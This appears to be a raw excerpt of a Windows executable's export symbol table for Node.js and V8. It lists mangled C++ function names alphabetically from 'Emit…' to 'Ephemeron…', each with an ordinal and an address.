                                                                                                                                                                                                                                    ?EmitPrepareResults@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@UPushParameter@compiler@internal@v8@@@34@PEBVCallDescriptor@234@PEAVNode@234@@Z54690x1405853f0
                                                                                                                                                                                                                                    ?EmitProcessBeforeExit@node@@YA?AV?$Maybe@_N@v8@@PEAVEnvironment@1@@Z54700x14029b890
                                                                                                                                                                                                                                    ?EmitProcessExit@node@@YA?AV?$Maybe@H@v8@@PEAVEnvironment@1@@Z54710x14029bb10
                                                                                                                                                                                                                                    ?EmitReturnEntry@HandlerTable@internal@v8@@SAXPEAVAssembler@23@HH@Z54720x140bf98a0
                                                                                                                                                                                                                                    ?EmitReturnTableStart@HandlerTable@internal@v8@@SAHPEAVAssembler@23@@Z54730x140bf98e0
                                                                                                                                                                                                                                    ?EmitSetLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z54740x140634a10
                                                                                                                                                                                                                                    ?EmitSwitch@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeJumpTable@234@@Z54750x140a52410
                                                                                                                                                                                                                                    ?EmitTableSwitch@InstructionSelector@compiler@internal@v8@@AEAAXAEBVSwitchInfo@234@AEBVInstructionOperand@234@@Z54760x14105d520
                                                                                                                                                                                                                                    ?EmitTeeLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z54770x140634a20
                                                                                                                                                                                                                                    ?EmitU32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z54780x140634a30
                                                                                                                                                                                                                                    ?EmitValueType@WasmFunctionBuilder@wasm@internal@v8@@QEAAXVValueType@234@@Z54790x140634aa0
                                                                                                                                                                                                                                    ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00PEAVFlagsContinuation@234@@Z54800x14105d680
                                                                                                                                                                                                                                    ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0PEAVFlagsContinuation@234@@Z54810x14105d6f0
                                                                                                                                                                                                                                    ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@PEAVFlagsContinuation@234@@Z54820x14105d740
                                                                                                                                                                                                                                    ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@0101PEAVFlagsContinuation@234@@Z54830x14105d780
                                                                                                                                                                                                                                    ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@01PEAVFlagsContinuation@234@@Z54840x14105db20
                                                                                                                                                                                                                                    ?EmitWithI32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@H@Z54850x140634ac0
                                                                                                                                                                                                                                    ?EmitWithPrefix@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@@Z54860x140634b10
                                                                                                                                                                                                                                    ?EmitWithU32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@I@Z54870x140634bd0
                                                                                                                                                                                                                                    ?EmitWithU8@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@E@Z54880x140634c70
                                                                                                                                                                                                                                    ?EmitWithU8U8@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@EE@Z54890x140634cd0
                                                                                                                                                                                                                                    ?Empty@DeoptimizationData@internal@v8@@SA?AV?$Handle@VDeoptimizationData@internal@v8@@@23@PEAVIsolate@23@@Z54900x1409fab80
                                                                                                                                                                                                                                    ?Empty@OSROptimizedCodeCache@internal@v8@@SA?AV?$Handle@VOSROptimizedCodeCache@internal@v8@@@23@PEAVIsolate@23@@Z54910x1408f50f0
                                                                                                                                                                                                                                    ?Empty@ScopeInfo@internal@v8@@SA?AV123@PEAVIsolate@23@@Z54920x1408f17d0
                                                                                                                                                                                                                                    ?Empty@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@@Z54930x140097670
                                                                                                                                                                                                                                    ?EmptyArrayBoilerplateDescriptionConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ54940x140a5dd40
                                                                                                                                                                                                                                    ?EmptyBackingStore@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@W4SharedFlag@23@@Z54950x140a06960
                                                                                                                                                                                                                                    ?EmptyDeleter@BackingStore@v8@@SAXPEAX_K0@Z54960x1400971a0
                                                                                                                                                                                                                                    ?EmptyFixedArrayConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ54970x1410ded70
                                                                                                                                                                                                                                    ?EmptyFixedArrayConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ54980x140a5dd50
                                                                                                                                                                                                                                    ?EmptyIdentifierString@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ54990x14088e9a0
                                                                                                                                                                                                                                    ?EmptyObjectBoilerplateDescriptionConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ55000x140a5dd60
                                                                                                                                                                                                                                    ?EmptyStateValues@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ55010x1410dedb0
                                                                                                                                                                                                                                    ?EmptyStringConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ55020x1410dee10
                                                                                                                                                                                                                                    ?EmptyStringConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VString@internal@v8@@@34@XZ55030x1410e2510
                                                                                                                                                                                                                                    ?EmptyStringRootIsInitialized@Factory@internal@v8@@AEAA_NXZ55040x140b23e50
                                                                                                                                                                                                                                    ?EmptyStringRootIsInitialized@LocalFactory@internal@v8@@AEAA_NXZ55050x140097530
                                                                                                                                                                                                                                    ?Enable@CodeEventHandler@v8@@QEAAXXZ55060x140c81420
                                                                                                                                                                                                                                    ?EnableCodeLogging@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z55070x14064c820
                                                                                                                                                                                                                                    ?EnableCompilationForSourcelessUse@V8@v8@@SAXXZ55080x140c81430
                                                                                                                                                                                                                                    ?EnableCpuFeature@AssemblerBase@internal@v8@@QEAAXW4CpuFeature@23@@Z55090x140559790
                                                                                                                                                                                                                                    ?EnableDetachedGarbageCollectionsForTesting@CppHeap@internal@v8@@QEAAXXZ55100x140b3f490
                                                                                                                                                                                                                                    ?EnableDetachedGarbageCollectionsForTesting@CppHeap@v8@@QEAAXXZ55110x140b3f4f0
                                                                                                                                                                                                                                    ?EnableForNextGCForTesting@Compactor@internal@cppgc@@QEAAXXZ55120x14051fad0
                                                                                                                                                                                                                                    ?EnableInProcessStackDumping@debug@base@v8@@YA_NXZ55130x140ffeb30
                                                                                                                                                                                                                                    ?EnableInlineAllocation@Heap@internal@v8@@QEAAXXZ55140x140b03b20
                                                                                                                                                                                                                                    ?EnableInterrupts@StackGuard@internal@v8@@AEAAXXZ55150x140b58500
                                                                                                                                                                                                                                    ?EnableIteration@IdentityMapBase@internal@v8@@IEAAXXZ55160x1407bb7c0
                                                                                                                                                                                                                                    ?EnableLogging@CpuProfiler@internal@v8@@AEAAXXZ55170x14087b610
                                                                                                                                                                                                                                    ?EnableMarkingBarrier@GlobalHandles@internal@v8@@SAXPEAVIsolate@23@@Z55180x140b4cc70
                                                                                                                                                                                                                                    ?EnableMemorySavingsMode@Isolate@internal@v8@@QEAAXXZ55190x14053f0a0
                                                                                                                                                                                                                                    ?EnableMemorySavingsMode@Isolate@v8@@QEAAXXZ55200x14053f0a0
                                                                                                                                                                                                                                    ?EnableScriptAndEval@CompilationCache@internal@v8@@QEAAXXZ55210x140c0b780
                                                                                                                                                                                                                                    ?EnableTrapHandler@trap_handler@internal@v8@@YA_N_N@Z55220x1407200b0
                                                                                                                                                                                                                                    ?EnableWebAssemblyTrapHandler@V8@v8@@SA_N_N@Z55230x140c81460
                                                                                                                                                                                                                                    ?Enabled@GCIdleTimeHandler@internal@v8@@QEAA_NXZ55240x140b1e9a0
                                                                                                                                                                                                                                    ?Enabled@OptimizingCompileDispatcher@internal@v8@@SA_NXZ55250x1407f68c0
                                                                                                                                                                                                                                    ?Enabled@StatsCounter@internal@v8@@QEAA_NXZ55260x140a1d230
                                                                                                                                                                                                                                    ?Encode@Utf8@unibrow@@SAIPEADIH_N@Z55270x1407ca9d0
                                                                                                                                                                                                                                    ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@PEBD_KW4encoding@1@@Z55280x14029fca0
                                                                                                                                                                                                                                    ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@PEBG_K@Z55290x14029fd10
                                                                                                                                                                                                                                    ?EncodeI32ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAII@Z55300x140623ff0
                                                                                                                                                                                                                                    ?EncodeI64ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAI_K@Z55310x140624050
                                                                                                                                                                                                                                    ?EncodeOneByte@Utf8@unibrow@@SAIPEADE@Z55320x1407caae0
                                                                                                                                                                                                                                    ?EncodeSandboxedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z55330x14050fb40
                                                                                                                                                                                                                                    ?End@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_K@Z55340x14103a170
                                                                                                                                                                                                                                    ?End@LiveRange@compiler@internal@v8@@QEBA?AVLifetimePosition@234@XZ55350x1410989d0
                                                                                                                                                                                                                                    ?EndArray@TracedValue@tracing@v8@@QEAAXXZ55360x14010a6f0
                                                                                                                                                                                                                                    ?EndBlock@InstructionScheduler@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z55370x1410dcff0
                                                                                                                                                                                                                                    ?EndBlock@InstructionSelector@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z55380x14105db70
                                                                                                                                                                                                                                    ?EndBlock@InstructionSequence@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z55390x141032110
                                                                                                                                                                                                                                    ?EndCatch@TryCatchBuilder@interpreter@internal@v8@@QEAAXXZ55400x140a33ce0
                                                                                                                                                                                                                                    ?EndColumn@Script@debug@v8@@QEBAHXZ55410x140bc95e0
                                                                                                                                                                                                                                    ?EndDictionary@TracedValue@tracing@v8@@QEAAXXZ55420x14010a750
                                                                                                                                                                                                                                    ?EndFinally@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ55430x1400971a0
                                                                                                                                                                                                                                    ?EndLine@Script@debug@v8@@QEBAHXZ55440x140bc9760
                                                                                                                                                                                                                                    ?EndOffset@BlockData@Coverage@debug@v8@@QEBAHXZ55450x1403dd540
                                                                                                                                                                                                                                    ?EndOffset@FunctionData@Coverage@debug@v8@@QEBAHXZ55460x1403dd540
                                                                                                                                                                                                                                    ?EndPosition@SharedFunctionInfo@internal@v8@@QEBAHXZ55470x1408ec960
                                                                                                                                                                                                                                    ?EndRecursiveTypeGroup@WasmModuleBuilder@wasm@internal@v8@@QEAAXXZ55480x140634d50
                                                                                                                                                                                                                                    ?EndTry@TryCatchBuilder@interpreter@internal@v8@@QEAAXXZ55490x140a33cf0
                                                                                                                                                                                                                                    ?EndTry@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ55500x140a33d60
                                                                                                                                                                                                                                    ?EnforceFlagImplications@FlagList@internal@v8@@SAXXZ55510x140b4fe60
                                                                                                                                                                                                                                    ?Enqueue@BranchConditionDuplicator@compiler@internal@v8@@QEAAXPEAVNode@234@@Z55520x1411167f0
                                                                                                                                                                                                                                    ?Enqueue@ControlFlowOptimizer@compiler@internal@v8@@AEAAXPEAVNode@234@@Z55530x141129590
                                                                                                                                                                                                                                    ?Enqueue@LazyCompileDispatcher@internal@v8@@QEAAXPEAVLocalIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@@Z55540x140bd9730
                                                                                                                                                                                                                                    ?Enqueue@ProfilerEventsProcessor@internal@v8@@QEAAXAEBVCodeEventsContainer@23@@Z55550x14087b840
                                                                                                                                                                                                                                    ?EnqueueMicrotask@Isolate@v8@@QEAAXP6AXPEAX@Z0@Z55560x140c81470
                                                                                                                                                                                                                                    ?EnqueueMicrotask@Isolate@v8@@QEAAXV?$Local@VFunction@v8@@@2@@Z55570x140c81490
                                                                                                                                                                                                                                    ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@QEAAXVMicrotask@23@@Z55580x140b59fa0
                                                                                                                                                                                                                                    ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@UEAAXPEAVIsolate@3@P6AXPEAX@Z1@Z55590x140b5a000
                                                                                                                                                                                                                                    ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@UEAAXPEAVIsolate@3@V?$Local@VFunction@v8@@@3@@Z55600x140b5a0f0
                                                                                                                                                                                                                                    ?EnqueueNode@ProfileTree@internal@v8@@QEAAXPEBVProfileNode@23@@Z55610x14085cc10
                                                                                                                                                                                                                                    ?EnsureAllRegistersAreFlushed@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEBA_NXZ55620x140a37eb0
                                                                                                                                                                                                                                    ?EnsureAllocation@NewSpace@internal@v8@@EEAA_NHW4AllocationAlignment@23@W4AllocationOrigin@23@PEAH@Z55630x140ab7a80
                                                                                                                                                                                                                                    ?EnsureAllocation@PagedSpace@internal@v8@@MEAA_NHW4AllocationAlignment@23@W4AllocationOrigin@23@PEAH@Z55640x140aac8f0
                                                                                                                                                                                                                                    ?EnsureBlackAllocated@IncrementalMarking@internal@v8@@QEAAX_K0@Z55650x140af61d0
                                                                                                                                                                                                                                    ?EnsureBlock@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@PEAVRawMachineLabel@234@@Z55660x141218e40
                                                                                                                                                                                                                                    ?EnsureBreakInfo@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z55670x140bb94c0
                                                                                                                                                                                                                                    ?EnsureCFGWellFormedness@Schedule@compiler@internal@v8@@AEAAXXZ55680x1410686e0
                                                                                                                                                                                                                                    ?EnsureCapacity@Bignum@base@v8@@AEAAXH@Z55690x140ffe2c0
                                                                                                                                                                                                                                    ?EnsureCapacity@StringTable@internal@v8@@AEAAPEAVData@123@VPtrComprCageBase@23@H@Z55700x1408e3f50
                                                                                                                                                                                                                                    ?EnsureChunk@TypedSlots@internal@v8@@IEAAPEAUChunk@123@XZ55710x140a9d060
                                                                                                                                                                                                                                    ?EnsureConsoleOutputWin32@base@v8@@YAXXZ55720x140ff3be0
                                                                                                                                                                                                                                    ?EnsureDecodedOffsets@AsmJsOffsetInformation@wasm@internal@v8@@AEAAXXZ55730x14062d770
                                                                                                                                                                                                                                    ?EnsureDescriptorSlack@Map@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@H@Z55740x140928080
                                                                                                                                                                                                                                    ?EnsureFeedbackVector@JSFunction@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@PEAVIsCompiledScope@23@@Z55750x14097f980
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexNonPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@Z@Z55760x14051c070
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexNonPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@ZP6A?AUHeapObjectName@23@2@Z@Z55770x14051c0b0
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexNonPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@ZP6AXPEAX@Z@Z55780x14051c0f0
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexNonPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@ZP6AXPEAX@ZP6A?AUHeapObjectName@23@2@Z@Z55790x14051c130
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@Z@Z55800x14051c170
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@ZP6A?AUHeapObjectName@23@2@Z@Z55810x14051c1b0
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@ZP6AXPEAX@Z@Z55820x14051c1f0
                                                                                                                                                                                                                                    ?EnsureGCInfoIndexPolymorphic@EnsureGCInfoIndexTrait@internal@cppgc@@CAGAEAU?$atomic@G@std@@P6AXPEAVVisitor@3@PEBX@ZP6AXPEAX@ZP6A?AUHeapObjectName@23@2@Z@Z55830x14051c230
                                                                                                                                                                                                                                    ?EnsureHasFullTransitionArray@TransitionsAccessor@internal@v8@@CAXPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@@Z55840x1408d3e90
                                                                                                                                                                                                                                    ?EnsureHasInitialMap@JSFunction@internal@v8@@SAXV?$Handle@VJSFunction@internal@v8@@@23@@Z55850x14097fa10
                                                                                                                                                                                                                                    ?EnsureIndirectFunctionTableWithMinimumSize@WasmInstanceObject@internal@v8@@SA_NV?$Handle@VWasmInstanceObject@internal@v8@@@23@HI@Z55860x140624110
                                                                                                                                                                                                                                    ?EnsureInputCount@Node@compiler@internal@v8@@QEAAXPEAVZone@34@H@Z55870x14102a6e0
                                                                                                                                                                                                                                    ?EnsureInterval@TopLevelLiveRange@compiler@internal@v8@@QEAAXVLifetimePosition@234@0PEAVZone@34@_N@Z55880x14110d570
                                                                                                                                                                                                                                    ?EnsureParkedBeforeDestruction@LocalHeap@internal@v8@@AEAAXXZ55890x1400971a0
                                                                                                                                                                                                                                    ?EnsurePersistentHandles@LocalHeap@internal@v8@@AEAAXXZ55900x140af1ba0
                                                                                                                                                                                                                                    ?EnsureRareData@ClassScope@internal@v8@@AEAAPEAURareData@123@XZ55910x1407ff0f0
                                                                                                                                                                                                                                    ?EnsureRareData@DeclarationScope@internal@v8@@AEAAPEAURareData@123@XZ55920x1407ff190
                                                                                                                                                                                                                                    ?EnsureReturnSlots@Frame@compiler@internal@v8@@QEAAXH@Z55930x14057ec00
                                                                                                                                                                                                                                    ?EnsureSourcePositionsAvailable@FrameSummary@internal@v8@@QEAAXXZ55940x140b7aee0
                                                                                                                                                                                                                                    ?EnsureSplitEdgeForm@Schedule@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@@Z55950x1400971a0
                                                                                                                                                                                                                                    ?EnsureSweepingCompleted@MarkCompactCollector@internal@v8@@QEAAXW4SweepingForcedFinalizationMode@123@@Z55960x140ad9f50
                                                                                                                                                                                                                                    ?EnsureUnmappingCompleted@Unmapper@MemoryAllocator@internal@v8@@QEAAXXZ55970x140abd300
                                                                                                                                                                                                                                    ?EnsureValid@iterator@StateValuesAccess@compiler@internal@v8@@AEAAXXZ55980x1410e0020
                                                                                                                                                                                                                                    ?EnsureWin32MemoryAPILoaded@OS@base@v8@@SAXXZ55990x140ff3c10
                                                                                                                                                                                                                                    ?EnsureWritableFastElements@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ56000x1410d7340
                                                                                                                                                                                                                                    ?Enter@Context@v8@@QEAAXXZ56010x140c816c0
                                                                                                                                                                                                                                    ?Enter@DisallowGarbageCollectionScope@subtle@cppgc@@SAXAEAVHeapHandle@3@@Z56020x14051ab70
                                                                                                                                                                                                                                    ?Enter@Isolate@internal@v8@@QEAAXXZ56030x140b69af0
                                                                                                                                                                                                                                    ?Enter@Isolate@v8@@QEAAXXZ56040x140c81810
                                                                                                                                                                                                                                    ?Enter@NoGarbageCollectionScope@subtle@cppgc@@SAXAEAVHeapHandle@3@@Z56050x14051ab90
                                                                                                                                                                                                                                    ?EnterApiExitFrame@MacroAssembler@internal@v8@@QEAAXH@Z56060x1405f75b0
                                                                                                                                                                                                                                    ?EnterAtomicPause@MarkerBase@internal@cppgc@@QEAAXW4EmbedderStackState@3@@Z56070x140513730
                                                                                                                                                                                                                                    ?EnterExitFrame@MacroAssembler@internal@v8@@QEAAXH_NW4Type@StackFrame@23@@Z56080x1405f75f0
                                                                                                                                                                                                                                    ?EnterExitFrameEpilogue@MacroAssembler@internal@v8@@AEAAXH_N@Z56090x1405f7680
                                                                                                                                                                                                                                    ?EnterExitFramePrologue@MacroAssembler@internal@v8@@AEAAXVRegister@23@W4Type@StackFrame@23@@Z56100x1405f7860
                                                                                                                                                                                                                                    ?EnterFinalPause@CppHeap@internal@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z56110x140b3f580
                                                                                                                                                                                                                                    ?EnterFinalPause@LocalEmbedderHeapTracer@internal@v8@@QEAAXXZ56120x140b3aa50
                                                                                                                                                                                                                                    ?EnterFrame@TurboAssembler@internal@v8@@QEAAXW4Type@StackFrame@23@@Z56130x1405f7960
                                                                                                                                                                                                                                    ?EnterFrame@TurboAssembler@internal@v8@@QEAAXW4Type@StackFrame@23@_N@Z56140x14050fb40
                                                                                                                                                                                                                                    ?EnterGlobalScope@AsmJsScanner@internal@v8@@QEAAXXZ56150x140734460
                                                                                                                                                                                                                                    ?EnterLocalScope@AsmJsScanner@internal@v8@@QEAAXXZ56160x140734470
                                                                                                                                                                                                                                    ?Entries@ScriptData@TypeProfile@debug@v8@@QEBA?AV?$vector@VEntry@TypeProfile@debug@v8@@V?$allocator@VEntry@TypeProfile@debug@v8@@@std@@@std@@XZ56170x140bc9860
                                                                                                                                                                                                                                    ?EntryAtIndex@IdentityMapBase@internal@v8@@IEBAPEA_KH@Z56180x1407bb7f0
                                                                                                                                                                                                                                    ?EntryForEnumerationIndex@SwissNameDictionary@internal@v8@@QEAAHH@Z56190x14053f0b0
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56200x14090c9e0
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56210x14090ca60
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56220x14090cb20
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56230x14090cb90
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56240x14090cb90
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56250x14090cbf0
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56260x14090ca60
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56270x14090ca60
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56280x14090cca0
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56290x14090cbf0
                                                                                                                                                                                                                                    ?EntryForProbe@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@AEAA?AVInternalIndex@23@VReadOnlyRoots@23@VObject@23@HV423@@Z56300x14090cca0
                                                                                                                                                                                                                                    ?EntryFromBuiltinAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@W4Builtin@23@@Z56310x1405f79d0
                                                                                                                                                                                                                                    ?EntryFromBuiltinIndexAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@VRegister@23@@Z56320x1405f7a30
                                                                                                                                                                                                                                    ?EntrySizeFromMode@HandlerTable@internal@v8@@CAHW4EncodingMode@123@@Z56330x140bf9900
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56340x14090cd50
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56350x14053f0f0
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56360x14053f100
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56370x14053f110
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56380x14053f0f0
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56390x14090cd60
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56400x14053f120
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56410x14053f0f0
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56420x14053f0f0
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56430x14053f0f0
                                                                                                                                                                                                                                    ?EntryToIndex@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56440x14053f120
                                                                                                                                                                                                                                    ?EntryToIndex@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHVInternalIndex@23@@Z56450x14052db40
                                                                                                                                                                                                                                    ?EntryToIndex@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHVInternalIndex@23@@Z56460x14053f130
                                                                                                                                                                                                                                    ?EntryToIndex@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAAHVInternalIndex@23@@Z56470x14053f150
                                                                                                                                                                                                                                    ?EntryToIndexRaw@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHH@Z56480x14052db40
                                                                                                                                                                                                                                    ?EntryToIndexRaw@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHH@Z56490x14053f130
                                                                                                                                                                                                                                    ?EntryToIndexRaw@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAAHH@Z56500x14053f150
                                                                                                                                                                                                                                    ?EntryToValueIndex@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56510x14053f170
                                                                                                                                                                                                                                    ?EntryToValueIndex@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAHVInternalIndex@23@@Z56520x14053f170
                                                                                                                                                                                                                                    ?EntryToValueIndex@NameToIndexHashTable@internal@v8@@CAHVInternalIndex@23@@Z56530x14053f170
                                                                                                                                                                                                                                    ?EphemeronHashTablePrint@EphemeronHashTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z56540x140b8bee0
                                                                                                                                                                                                                                    ?EphemeronKeyWriteBarrierFromCode@Heap@internal@v8@@SAX_K0PEAVIsolate@23@@Z56550x140b03df0
